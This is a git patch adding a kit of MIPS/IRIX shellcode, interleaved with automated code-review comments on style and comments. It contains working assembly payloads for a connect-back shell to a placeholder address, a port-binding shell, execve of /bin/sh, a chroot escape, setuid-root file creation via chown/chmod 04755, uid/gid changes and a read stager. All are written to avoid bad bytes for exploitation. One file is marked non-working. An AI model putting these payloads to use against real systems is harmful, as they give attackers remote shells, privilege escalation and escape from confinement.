From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/mips_irix/Makefile | 22 ++++++ other/shellkit/mips_irix/README | 25 +++++++ other/shellkit/mips_irix/chmod.s | 49 +++++++++++++ other/shellkit/mips_irix/chroot.s | 60 ++++++++++++++++ other/shellkit/mips_irix/connectsh.s | 109 ++++++++++++++++++++++++++++ other/shellkit/mips_irix/execvesh.s | 36 ++++++++++ other/shellkit/mips_irix/exit.s | 29 ++++++++ other/shellkit/mips_irix/portshellsh.s | 126 +++++++++++++++++++++++++++++++++ other/shellkit/mips_irix/read.s | 51 +++++++++++++ other/shellkit/mips_irix/setgid.s | 30 ++++++++ other/shellkit/mips_irix/setreuid.s | 32 +++++++++ 11 files changed, 569 insertions(+) create mode 100644 other/shellkit/mips_irix/Makefile create mode 100644 other/shellkit/mips_irix/README create mode 100644 other/shellkit/mips_irix/chmod.s create mode 100644 other/shellkit/mips_irix/chroot.s create mode 100644 other/shellkit/mips_irix/connectsh.s create mode 100644 other/shellkit/mips_irix/execvesh.s create mode 100644 other/shellkit/mips_irix/exit.s create mode 100644 other/shellkit/mips_irix/portshellsh.s create mode 100644 other/shellkit/mips_irix/read.s create mode 100644 other/shellkit/mips_irix/setgid.s create mode 100644 other/shellkit/mips_irix/setreuid.s (limited to 'other/shellkit/mips_irix') diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile new file mode 100644 index 0000000..a68d231 --- /dev/null +++ b/other/shellkit/mips_irix/Makefile 
@@ -0,0 +1,22 @@ + +#DFLAGS=-O2 +DFLAGS=-g -ggdb +CC=gcc +CFLAGS=$(DFLAGS) -Wall -DIRIX + +all: + $(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s + $(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s + $(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s + $(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s + $(CC) $(CFLAGS) -o exit ../codedump.c exit.s + $(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s + $(CC) $(CFLAGS) -o read ../codedump.c read.s + $(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s + $(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s + +clean: + rm -f code.h codetest \ + chmod chroot connectsh execvesh exit portshellsh read \ + setgid setreuid + diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README new file mode 100644 index 0000000..a78c668 --- /dev/null +++ b/other/shellkit/mips_irix/README @@ -0,0 +1,25 @@ + +mips/irix shellcodes +some comments in this file + + +for execvesh and portshellsh append "/bin/sh\x42" to the code. + +if you want to execute something different than "/bin/sh", be sure to properly +set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop +and adjust the self-relocation. + +the codedump utility build extra cache control syscalls, so it flushes all +caches properly and you can run the code safily then from a flushed cache. + +example: + +scut@hyperion $ make >/dev/null +scut@hyperion $ ./execvesh + <... dumps the hexcode ...> +scut@hyperion $ ./execvesh exec +len = 68 +$ +$ exit +scut@hyperion $ + diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s new file mode 100644 index 0000000..181c123 --- /dev/null +++ b/other/shellkit/mips_irix/chmod.s 
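Review bot: `all` is a single recipe with no prerequisites, so every one of the nine binaries is relinked on each invocation and nothing is tracked against `../codedump.c` or the `.s` files; `all` and `clean` are also not declared phony, so a stray file named `all` or `clean` in the directory would silently disable them. A static pattern rule over a `PROGS` list gives per-target dependencies and lets `clean` reuse the same list instead of a hand-maintained one. `clean` also removes `code.h` and `codetest`, which no rule here creates (presumably left behind by codedump); a one-line comment saying so would stop the next reader from hunting for the rule.
```make
# … unchanged: DFLAGS / CC / CFLAGS …
PROGS = chmod chroot connectsh execvesh exit portshellsh read setgid setreuid

.PHONY: all clean

all: $(PROGS)

# one rule per program, relinked only when codedump.c or its own .s changes
$(PROGS): %: ../codedump.c %.s
	$(CC) $(CFLAGS) -o $@ $^

clean:
	rm -f code.h codetest $(PROGS)
```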
@@ -0,0 +1,49 @@ +/* MIPS/IRIX PIC chmod code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + + /* FIXME: its not workable atm */ +cbegin: + .set noreorder + .set nomacro + +lbl: bltzal zero, lbl + + li a1, 0x4141 /* a1 = uid ^ 0x5555 */ + xor a1, a1, 0x5555 + li a2, 0x4242 /* a2 = gid ^ 0x5555 */ + xor a2, a2, 0x555 + + addu a0, ra, 0x0180 + sb zero, -(0x0148 + -(9))(a0) + subu a0, a0, 0x0148 + + /* chown (a0 = pathname, a1 = uid, a2 = gid) */ + li v0, SYS_chown /* 0x03f8 */ + syscall + + /* chmod (a0 = pathname, a1 = 04755) */ + li a1, 0x09ed /* a1 = 04755 = 0x09ed */ + li v0, SYS_chmod /* 0x03f7 */ + syscall + + li v0, SYS_exit /* 0x03e9 */ + syscall + li t8, 0x72ec /* sane ds */ + + .end cbegin +cend: + + /* XXX: append pathname here, will get NUL terminated */ diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s new file mode 100644 index 0000000..96a1595 --- /dev/null +++ b/other/shellkit/mips_irix/chroot.s 
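Review bot: The `/* FIXME: its not workable atm */` above `cbegin` records that the file is broken but not what is known to be wrong, and the header calls this "chmod code" although the sequence is chown, chmod and _exit, so a later reader cannot tell which part the FIXME is about. State the known problem next to the FIXME and widen the header, e.g. `/* MIPS/IRIX PIC chown+chmod code — FIXME: not working yet: <reason> */`. The trailing `/* XXX: append pathname here, will get NUL terminated */` is the only usage note for this file; the README documents the equivalent append step for execvesh and portshellsh, so this one belongs there as well.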
@@ -0,0 +1,60 @@ +/* MIPS/IRIX PIC chroot break + * without 0x00, 0x0a, 0x0d, 0x25 + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + +foo: bltzal zero, foo + li a1, 0700 /* a1 = 0700 permission */ + + /* mkdir ("Y..", 0700); + */ + lui t2, 0x592e + ori t2, 0x2cff /* t1 = "Y..\x00" */ + add t2, t2, 0x0101 + sw t2, -48(ra) + + subu a0, ra, 48 /* a0 = "Y.." */ + li v0, SYS_mkdir /* 0x0438 */ + syscall + + /* chroot ("Y.."); + * a0 still points to it + */ + addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */ + syscall + + /* chdir ("..") a few times + */ + li s2, 0x1211 /* 12 times chdir ("..") */ + +foo2: subu a0, ra, 47 /* "..\x00" */ + li v0, SYS_chdir /* 0x03f4 */ + syscall + sub s2, 0x0101 + bgez s2, foo2 + + addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */ + subu a0, ra, 46 /* ".\x00" */ + syscall + li t2, 0x7350 /* NOP */ + + .end cbegin +cend: + nop + diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s new file mode 100644 index 0000000..7b77d4e --- /dev/null +++ b/other/shellkit/mips_irix/connectsh.s 
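Review bot: The comment on `ori t2, 0x2cff` reads `/* t1 = "Y..\x00" */`, but the register is `t2` and the value only becomes `"Y..\x00"` after the following `add t2, t2, 0x0101` (0x592e2cff + 0x0101 = 0x592e2e00); as written the comment names the wrong register and the wrong line. Move it onto the `add` as `/* t2 = "Y..\x00" (0x592e2cff + 0x0101) */` and leave the `lui`/`ori` pair uncommented or mark them as the partial value. The `subu a0, ra, 48` comment `/* a0 = "Y.." */` then pairs naturally with the `sw t2, -48(ra)` store above it.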
@@ -0,0 +1,109 @@ +/* MIPS/IRIX PIC connect shell shellcode + * no 0x00, 0x0a, 0x0d, 0x25 bytes + * + * -sc + */ + + /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */ + +#include +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) + */ + li s6, 0x7350 + subu a0, s6, 0x734e /* AF_INET = 2 */ + subu a1, s6, 0x734e /* SOCK_STREAM = 2 */ + subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */ + li v0, SYS_socket /* 0x0453 */ + syscall + + /* socket returned in v0, save to a0 + */ + andi a0, v0, 0xffff /* a0 = socket */ + + /* build struct sockaddr_in + * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000 + */ + subu t2, s6, 0x734e /* t2 = 0x0002 */ + sh t2, -16(sp) + li t2, 0x4141 /* t2 = port number */ + sh t2, -14(sp) + + /* ip address */ + lui t2, 0x4142 + ori t2, t2, 0x4344 + sw t2, -12(sp) + + sw zero, -8(sp) + sw zero, -4(sp) + + /* connect (socket, (struct sockaddr *) cs, + * sizeof (struct sockaddr_in) + */ + subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */ + subu a1, sp, a2 /* a1 = (struct sockaddr *) */ + li v0, SYS_connect /* 0x0443 */ + syscall + + /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2) + */ + subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */ + + /* socket returned in v0, save in s7 + */ + andi s7, a0, 0xffff + + /* dup is emulated through close and fcntl, since irix offers no + * native dup syscall as for example linux. 
see phrack 56 for details + */ +dup_loop: + andi a0, s3, 0x0103 /* a0 = STD*_FILENO */ + li v0, SYS_close /* 0x03ee */ + syscall + + andi a0, s7, 0xffff /* a0 = socket */ + slti a1, zero, -1 /* a1 = 0 */ + andi a2, s3, 0x0103 /* a2 = STD*_FILENO */ + li v0, SYS_fcntl /* 0x0426 */ + syscall + + subu s3, 0x1011 + bgez s3, dup_loop + + /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL) + */ + sw zero, -4(sp) + + /* a2 (envp) is already zero due to the dup_loop + */ +gaddr: bltzal zero, gaddr /* rock on-. lsd */ + subu a1, sp, 8 + + /* ra contains the proper address now */ + addu ra, ra, 0x0120 /* add 32 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) /* store NUL */ + sw a0, -8(sp) + li v0, SYS_execve + syscall + + .end cbegin +cend: + + /* XXX append here: "/bin/sh\x42" */ + diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s new file mode 100644 index 0000000..89fd45b --- /dev/null +++ b/other/shellkit/mips_irix/execvesh.s @@ -0,0 +1,36 @@ +/* MIPS/IRIX PIC execve code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + sw zero, -4(sp) +foo: bltzal zero, foo + lw a2, -4(sp) + + addu ra, ra, 0x0124 /* add 36 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) + sw a0, -8(sp) + subu a1, sp, 8 + li v0, SYS_execve + syscall + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s new file mode 100644 index 0000000..aef7d01 --- /dev/null +++ b/other/shellkit/mips_irix/exit.s @@ -0,0 +1,29 @@ +/* MIPS/IRIX PIC exit code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* _exit (0) */ + slti a0, zero, -1 + li v0, SYS_exit /* 0x03e9 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + 
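Review bot: The comment `/* socket returned in v0, save in s7 */` before `andi s7, a0, 0xffff` is stale: at that point `v0` holds the return value of the preceding `connect` syscall and the copy is taken from `a0`, which was loaded from the socket earlier via `andi a0, v0, 0xffff`. The same comment is correct in portshellsh.s because there the copy really is from `v0` (the accept result), so this one should read `/* socket is still in a0 (v0 now holds connect's result), save in s7 */`. That also makes explicit the assumption that `a0` survives the `connect` syscall, which the code relies on but nothing here documents.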
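Review bot: The trailing `li t8, 0x7350` after the `syscall` in exit.s carries no comment, and the same uncommented instruction closes setgid.s and setreuid.s, while chmod.s, chroot.s and read.s annotate theirs as `/* sane ds */`, `/* NOP */` and `/* has to be a sane bds */`. Whatever the reason for the filler (presumably the code must end in a harmless instruction after the final syscall), it should be stated once where it first appears, e.g. `li t8, 0x7350 /* filler instruction after the last syscall, see chmod.s */`, and the same wording reused in setgid.s and setreuid.s. The `/* _exit (0) */` comment above `slti a0, zero, -1` is good; a matching `/* a0 = 0 without a zero byte */` on the slti itself would explain why `li` is not used.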
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s new file mode 100644 index 0000000..18070f6 --- /dev/null +++ b/other/shellkit/mips_irix/portshellsh.s 
@@ -0,0 +1,126 @@ +/* MIPS/IRIX PIC listening port shellcode + * no 0x00, 0x0a, 0x0d, 0x25 bytes + * + * bind a shell to tcp port 0x4141 + * + * 2001/05/25 optimized from 368 down to 188 bytes -sc. + * + */ + + /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */ + +#include +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) + */ + li s6, 0x7350 + subu a0, s6, 0x734e /* AF_INET = 2 */ + subu a1, s6, 0x734e /* SOCK_STREAM = 2 */ + subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */ + li v0, SYS_socket /* 0x0453 */ + syscall + + /* socket returned in v0, save to a0 + */ + andi a0, v0, 0xffff /* a0 = socket */ + + /* build struct sockaddr_in + * 0x0002port 0x00000000 0x00000000 0x00000000 + */ + subu t2, s6, 0x734e /* t2 = 0x0002 */ + sh t2, -16(sp) + li t2, 0x4141 /* t2 = port number */ + sh t2, -14(sp) + sw zero, -12(sp) + sw zero, -8(sp) + sw zero, -4(sp) + + /* bind (socket, (struct sockaddr *) srv_addr, + * sizeof (struct sockaddr_in) + */ + subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */ + subu a1, sp, a2 /* a1 = (struct sockaddr *) */ + li v0, SYS_bind /* 0x0442 */ + syscall + + /* listen (socket, backlog) + * XXX: is it safe here to make backlog = pointer-on-the-stack ? 
+ * should be, since its still a positive number + */ +/* subu a1, s6, 0x7340 *//* a1 = backlog = 0x10 */ + li v0, SYS_listen /* 0x0448 */ + syscall + + /* accept (socket, (struct sockaddr *) cl_addr, + * &socklen) + * XXX: a1 is still the pointer to the sockaddr struct + * a2 should be 0x10 still + */ + sw a2, -20(sp) + subu a2, sp, 20 /* a2 = &socklen */ + li v0, SYS_accept /* 0x0441 */ + syscall + + + /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2) + */ + subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */ + + /* socket returned in v0, save in s7 + */ + andi s7, v0, 0xffff + + /* dup is emulated through close and fcntl, since irix offers no + * native dup syscall as for example linux. see phrack 56 for details + */ +dup_loop: + andi a0, s3, 0x0103 /* a0 = STD*_FILENO */ + li v0, SYS_close /* 0x03ee */ + syscall + + andi a0, s7, 0xffff /* a0 = socket */ + slti a1, zero, -1 /* a1 = 0 */ + andi a2, s3, 0x0103 /* a2 = STD*_FILENO */ + li v0, SYS_fcntl /* 0x0426 */ + syscall + + subu s3, 0x1011 + bgez s3, dup_loop + + /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL) + */ + sw zero, -4(sp) + + /* a2 (envp) is already zero due to the dup_loop + */ +gaddr: bltzal zero, gaddr /* rock on-. lsd */ + subu a1, sp, 8 + + /* ra contains the proper address now */ + addu ra, ra, 0x0120 /* add 32 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) /* store NUL */ + sw a0, -8(sp) + li v0, SYS_execve + syscall + + .end cbegin +cend: + + /* XXX append here: "/bin/sh\x42" */ + diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s new file mode 100644 index 0000000..90ab25d --- /dev/null +++ b/other/shellkit/mips_irix/read.s 
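Review bot: The listen call leaves a commented-out `/* subu a1, s6, 0x7340 */` in place and an open `XXX: is it safe here to make backlog = pointer-on-the-stack ?` above it, so the hunk ships both a dead instruction and an unanswered question. Either delete the dead line and record the decision in the comment, e.g. `/* a1 is still the sockaddr pointer from bind; any positive backlog is accepted, so it is reused as the backlog */`, or restore the instruction. The accept comment `a2 should be 0x10 still` likewise depends on `a2` surviving the `listen` syscall; if that is documented for IRIX it is worth citing next to the phrack 56 reference, otherwise it should be marked as an assumption rather than stated as fact.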
@@ -0,0 +1,51 @@ +/* MIPS/IRIX PIC read/cacheflush code + * + * -sc. + * + * some note: + * since the data that is read in is treated in the data cache, you may + * experience a data/instruction cache incoherence, where the instruction + * cache still contains the old memory contents. to avoid this, send a lot + * of data, first the shellcode and then a huge bogus space of nops, which + * are to flush the data cache, later making the instruction cache populated + * with the real shellcode. or do it as we do it here, use a cacheflush + * syscall. this is only possible if this code is already in icache, so for + * the usual exploitation situation that does not help much. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + +foo: bltzal zero, foo + slti a0, zero, -1 + + addu ra, ra, (0x0101 + 48) + subu a1, ra, 0x0101 + + li a2, 0x1010 /* read 0x1010 bytes max */ + li v0, SYS_read + syscall + + subu a0, ra, 0x0101 /* data was read to here */ + li a1, 0x1010 /* should be cacheline aligned */ + li t2, -4 + not a2, t2 /* BCACHE = 0x03 */ + li v0, SYS_cachectl /* 0x047e */ + syscall + li t8, 0x7350 /* has to be a sane bds */ + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s new file mode 100644 index 0000000..3223892 --- /dev/null +++ b/other/shellkit/mips_irix/setgid.s @@ -0,0 +1,30 @@ +/* MIPS/IRIX PIC setgid chainable code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* setgid (a0) */ + li a0, 0x4141 /* gid ^ 0x5555 */ + xor a0, a0, 0x5555 + li v0, SYS_setgid /* 0x0416 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s new file mode 100644 index 0000000..9578262 --- /dev/null 
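Review bot: The length `0x1010` appears twice as a bare literal, once as the read limit (`li a2, 0x1010`) and once as the cachectl length (`li a1, 0x1010`), and the two must stay equal for the flush to cover what was read. Since the file already goes through the C preprocessor for its `#include` lines, a single `#define READLEN 0x1010` at the top with `li a2, READLEN` and `li a1, READLEN` keeps them in sync. The comment `/* should be cacheline aligned */` sits on the length register, but alignment would normally apply to the address in `a0`; if it is meant for the length, say so explicitly, otherwise move it to the `subu a0, ra, 0x0101` line.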
+++ b/other/shellkit/mips_irix/setreuid.s @@ -0,0 +1,32 @@ +/* MIPS/IRIX PIC setreuid chainable code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* setreuid (a0, a1) */ + li a0, 0x4141 /* ruid ^ 0x5555 */ + li a1, 0x4242 /* euid ^ 0x5555 */ + xor a0, a0, 0x5555 + xor a1, a1, 0x5555 + li v0, SYS_setreuid /* 0x0464 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + -- cgit v1.3